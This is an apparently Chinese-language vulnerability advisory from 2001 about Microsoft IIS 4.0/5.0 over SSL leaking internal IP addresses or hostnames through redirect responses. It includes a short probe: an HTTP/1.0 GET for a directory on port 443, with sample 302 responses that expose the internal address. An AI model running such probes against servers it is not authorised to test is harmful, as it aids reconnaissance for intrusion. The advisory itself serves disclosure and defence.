Microsoft IIS (SSL)泄漏内部地址漏洞
发布日期:2001-08-08
更新日期:2001-08-09
受影响系统:
Microsoft IIS 4.0 running SSL
- Microsoft Windows NT 4.0
Microsoft IIS 5.0 running SSL
- Microsoft Windows 2000
描述:
微软IIS 4.0和5.0 web服务器存在一个安全问题。允许远程攻击者获取服务器的内部IP地址
或者内部主机名。
如果IIS服务器正在使用SSL,那么通过连到服务器的TCP/443端口提交一个HTTP请求,攻击
者就可以获取内部地址或主机名。
<*来源:Marek Roy (
marek_roy@hotmail.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Marek Roy (
marek_roy@hotmail.com)提供了下列测试方法:
1. 首先使用SSL浏览器找到一个真实的目录,例如:
https://www.target.com/images/icon.gif
2. 使用兼容SSL的Perl脚本连接www.target.com的443端口,并执行下列命令
GET /images HTTP/1.0
3. 返回结果可能是这样:
HTTP/1.1 302 Object Moved
Location: https://192.168.1.10/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx
或者
HTTP/1.1 302 Object Moved
Location: https://netbiosname/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx
注意:使用HTTP/1.1不能得到上述结果。
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.microsoft.com
浏览次数:4062
严重程度:0(网友投票)